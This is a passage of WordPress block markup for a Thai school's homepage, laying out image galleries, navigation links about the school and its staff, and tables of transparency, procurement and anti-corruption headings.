{\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift 